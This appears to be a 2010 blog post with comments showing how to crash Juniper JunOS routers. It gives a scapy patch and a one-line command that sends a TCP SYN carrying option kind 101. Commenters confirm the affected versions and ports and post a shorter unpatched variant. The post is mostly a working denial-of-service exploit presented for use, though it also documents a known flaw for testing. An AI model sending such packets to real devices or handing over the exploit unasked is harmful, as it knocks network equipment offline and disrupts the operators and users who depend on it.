Use scapy to send JunOS killin’ packet

Written by jlgaddis on January 10, 2010 – 3:38 pm -


Photo from gr33ndata.

I just quickly hacked up scapy so that it would support sending TCP packets with option kind 0×65 (decimal 101). A diff is below (basically, just need to add two lines).

For reference, I’m on a FreeBSD 8.0 box running scapy 2.1.0 (from ports). inet.py is located in /usr/local/lib/python2.6/site-packages/scapy/layers.

$ diff inet.py inet.py.bak
203,204c203
<                 15 : ("AltChkSumOpt",None),
<                 101 : ("JunOS",None)
---
>                 15 : ("AltChkSumOpt",None)
215d213
<                 "JunOS":101
$

Once we've done that, we can then use scapy to launch a JunOS killin' packet for us!

$ sudo scapy
Welcome to Scapy (2.1.0)
>>> p=IP(dst='192.168.1.61')/TCP(dport=23,flags='S',options=[('JunOS', '')])
>>> send(p)
.
Sent 1 packets.
>>>

The box, of course, crashed and rebooted immediately.

Share and Enjoy:
  • StumbleUpon
  • Digg
  • Reddit
  • Facebook
  • del.icio.us
  • Twitter

Tags: , , , , | 9 Comments »

9 Comments to “Use scapy to send JunOS killin’ packet”

  1. anon Says:
    January 10th, 2010 at 4:25 pm

    does the vulnerability get exploited on any destination port other than telnet? what if you sent the same packet to 179, 22, 443, etc?

  2. jlgaddis Says:
    January 10th, 2010 at 4:27 pm

    @anon — According to Juniper’s PSN, it should work on any TCP port that is “listening”. So it would work on 179, 22, 443, etc. if BGP/SSH/HTTPS etc. were running. I’ve tested it on 22/TCP, 23/TCP, and 80/TCP.

  3. johnp Says:
    January 10th, 2010 at 5:18 pm

    thanks for confirming..what a mess!

  4. Ryan Says:
    January 10th, 2010 at 11:30 pm

    I am wondering if anybody has actually confirmed that this works on the super old versions of JunOS I am using… My guess is that the old versions with FreeBSD 4.11 underneath may not have this problem. I cannot get my 7.4 Olive box to crash, nor a M40 with 7.0.

  5. anonymous_coward Says:
    January 11th, 2010 at 9:20 am

    No need to patch Scapy: TCP(options=[(101, '')])

  6. Paul Says:
    January 11th, 2010 at 10:59 am

    I couldn’t duplicate this on a M series running 7.6R3.6. I did duplicate this on 8.5R4.3.

    Thanks for the code!

  7. Derek Says:
    January 11th, 2010 at 2:38 pm

    I confirmed this works on 7.6I2

  8. jlgaddis Says:
    January 11th, 2010 at 3:01 pm

    @anonymous_coward — Thanks! I don’t use scapy much and didn’t realize I could pass options like that.

  9. jlgaddis Says:
    January 11th, 2010 at 3:02 pm

    @Derek — thanks for the confirmation!

    The only 7.x version I have is 7.3R3.6. If I have time tonight, I’ll install it and see if I can get it to crash.

Leave a Comment